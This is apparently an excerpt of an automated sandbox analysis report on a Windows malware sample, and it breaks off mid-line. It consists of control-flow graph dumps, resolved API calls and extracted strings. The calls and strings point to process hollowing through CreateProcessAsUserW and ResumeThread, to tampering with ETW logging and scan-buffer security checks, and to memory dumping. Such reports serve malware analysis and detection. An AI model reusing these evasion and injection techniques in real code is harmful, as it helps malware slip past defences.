27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7f4c call 27e8818 * 6 CloseHandle call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 4903->5221 5222 27f8d72-27f8d84 call 27e85fc 4903->5222 5052->4784 5053->5052 5221->4694 5222->5221
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                        • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0291F7DC,0291F820,OpenSession,0282B37C,027FB9D4,UacScan,0282B37C), ref: 027F88B9
                                                                                        • ResumeThread.KERNEL32(00000000,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4), ref: 027F8F03
                                                                                        • CloseHandle.KERNEL32(00000000,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,00000000,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C), ref: 027F9082
                                                                                          • Part of subcall function 027E8818: LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                          • Part of subcall function 027E8818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                          • Part of subcall function 027E8818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0282B37C,027FB9D4,UacInitialize,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,UacScan,0282B37C), ref: 027F9474
                                                                                          • Part of subcall function 027D7E5C: GetFileAttributesA.KERNEL32(00000000,?,027F0714,ScanString,0282B37C,027FB9D4,OpenSession,0282B37C,027FB9D4,ScanString,0282B37C,027FB9D4,UacScan,0282B37C,027FB9D4,UacInitialize), ref: 027D7E67
                                                                                          • Part of subcall function 027EDF80: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,027EE052), ref: 027EDFBF
                                                                                          • Part of subcall function 027EDF80: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027EDFF9
                                                                                          • Part of subcall function 027EDF80: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027EE026
                                                                                          • Part of subcall function 027EDF80: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027EE02F
                                                                                          • Part of subcall function 027E8204: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027E828E), ref: 027E8270
                                                                                        • ExitProcess.KERNEL32(00000000,OpenSession,0282B37C,027FB9D4,ScanBuffer,0282B37C,027FB9D4,Initialize,0282B37C,027FB9D4,00000000,00000000,00000000,ScanString,0282B37C,027FB9D4), ref: 027FB4A5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
                                                                                        • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                        • API String ID: 2481178504-1225450241
                                                                                        • Opcode ID: 7899f309d0e2291e6f40dfa57cec160f1b906506c975b4133385b8badc5260e0
                                                                                        • Instruction ID: b4c5f7aba5514e3f01f023416b61cda6f43868a553a26921e9affe6cc03fbf0d
                                                                                        • Opcode Fuzzy Hash: 7899f309d0e2291e6f40dfa57cec160f1b906506c975b4133385b8badc5260e0
                                                                                        • Instruction Fuzzy Hash: 5F433B79A1415D8BCF22EB65DC959DEB3B6EF8C300F1440E6A50AAB310DB30AE95CF51
                                                                                        Function 027F4134 Relevance: 38.7, APIs: 2, Strings: 22, Instructions: 2741sleepCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 7740 27f4134-27f4386 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d7e5c 7805 27f4388-27f43de call 27ee64c call 27d4de0 call 27d4764 call 27d4de0 call 27edf80 7740->7805 7806 27f43e3-27f4ac5 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8784 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d49a0 call 27d3244 call 27ee96c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c Sleep call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e7c10 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e7c10 call 27e8818 call 27e8784 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d7e5c 7740->7806 7805->7806 8022 27f4b0d-27f4cd4 call 27e8784 call 27ef388 call 27d47ec call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8784 call 27d7e5c 7806->8022 8023 27f4ac7-27f4b08 call 27d4de0 * 2 call 27d4764 call 27edf80 7806->8023 8087 27f4cd6-27f4d2c call 27ee64c call 27d4de0 call 27d4764 call 27d4de0 call 27edf80 8022->8087 8088 27f4d31-27f4f80 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d7e5c 8022->8088 8023->8022 8087->8088 8162 27f4fdd-27f532e call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8784 call 27d4860 call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8784 call 27d7e5c 8088->8162 8163 27f4f82-27f4fd8 call 27ee64c call 27d4de0 call 27d4764 call 27d4de0 call 27edf80 8088->8163 8269 27f538b-27f576f call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8784 call 27d49a0 call 27e8488 Sleep call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4d74 call 27edef8 call 27d4d74 call 27edef8 call 27d49a0 call 27d4d74 call 27edef8 call 27d49a0 call 27d4d74 call 27edef8 call 27d49a0 call 27d4d74 call 27edef8 call 27d49a0 call 27d4d74 call 27edef8 call 27d49a0 call 27d4d74 call 27edef8 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 8162->8269 8270 27f5330-27f5386 call 27ee64c call 27d4de0 call 27d4764 call 27d4de0 call 27edf80 8162->8270 8163->8162 8407 27f5774-27f5f4a call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27ee68c call 27d4530 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d7acc call 27ef460 call 27d4530 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27ef388 call 27ef3fc call 27d4530 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 8269->8407 8270->8269 8636 27f7738-27f79b3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 8407->8636 8637 27f5f50-27f5f95 call 27d4860 call 27d49a0 call 27d46d4 call 27d7e5c 8407->8637 8783 27f79b9-27f800b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d47ec call 27d49a0 call 27e8488 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d49a0 call 27d46d4 call 27eacb0 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d36d0 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 8636->8783 8784 27f84e8-27f86e7 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 8636->8784 8637->8636 8654 27f5f9b-27f66a5 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4de0 * 2 call 27d4764 8637->8654 9316 27f66aa-27f66b1 call 27edf80 8654->9316 9549 27f800d-27f8010 8783->9549 9550 27f8012-27f82d4 call 27e5aec call 27d4bcc call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d49f8 call 27e7e50 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27eafd0 8783->9550 8959 27f86ed-27f88c0 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d47ec call 27d49a0 call 27d4d74 call 27d4df0 CreateProcessAsUserW 8784->8959 8960 27f9571-27f96f4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 8784->8960 9171 27f893e-27f8a49 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 8959->9171 9172 27f88c2-27f8939 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 8959->9172 9140 27f96fa-27f9709 call 27d48ec 8960->9140 9141 27f9ea0-27f9f0b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 8960->9141 9140->9141 9157 27f970f-27f99e2 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27ef388 call 27d4860 call 27d49a0 call 27d46d4 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d7e5c 9140->9157 9205 27f9f10-27f9f17 call 27e889c 9141->9205 9578 27f9c9a-27f9d05 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9157->9578 9579 27f99e8-27f9c89 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4de0 * 2 call 27d4764 9157->9579 9328 27f8a4b-27f8a4e 9171->9328 9329 27f8a50-27f8d70 call 27d49f8 call 27ee144 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27ed01c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 9171->9329 9172->9171 9218 27f9f1c-27fa036 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 9205->9218 9385 27fa03b-27fa042 call 27e889c 9218->9385 9326 27f66b6-27f6721 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9316->9326 9387 27f6726-27f672d call 27e889c 9326->9387 9328->9329 9863 27f8d89-27f9490 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c ResumeThread call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c CloseHandle call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7f4c call 27e8818 * 6 CloseHandle 9329->9863 9864 27f8d72-27f8d84 call 27e85fc 9329->9864 9395 27fa047-27fa069 call 27d46d4 * 2 9385->9395 9397 27f6732-27f68b5 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d48ec 9387->9397 9417 27fa06e-27fa075 call 27e889c 9395->9417 9632 27f68bb-27f6b08 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d4d74 call 27d4de0 call 27d4764 9397->9632 9633 27f6b19-27f6b84 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9397->9633 9428 27fa07a-27fa09c call 27d46d4 * 2 9417->9428 9444 27fa0a1-27fa0a8 call 27e889c 9428->9444 9454 27fa0ad-27fa0cf call 27d46d4 * 2 9444->9454 9475 27fa0d4-27fa0db call 27e889c 9454->9475 9486 27fa0e0-27fa14b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 9475->9486 9545 27fa150-27fa157 call 27e889c 9486->9545 9556 27fa15c-27fa276 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 9545->9556 9549->9550 10099 27f82d9-27f82f0 call 27d3700 9550->10099 9762 27fa27b-27fa282 call 27e889c 9556->9762 9652 27f9d0a-27f9d11 call 27e889c 9578->9652 10086 27f9c8e-27f9c95 call 27edf80 9579->10086 10079 27f6b0d-27f6b14 call 27edf80 9632->10079 9716 27f6b89-27f6b90 call 27e889c 9633->9716 9667 27f9d16-27f9e8f call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d49f8 9652->9667 9974 27f9e94-27f9e9b call 27e8c28 9667->9974 9730 27f6b95-27f7210 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d36d0 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d2f08 call 27d7990 call 27d47ec call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2f08 call 27d7990 call 27d47ec call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 9716->9730 10482 27f7215-27f7222 call 27e4dd4 9730->10482 9777 27fa287-27fa2a9 call 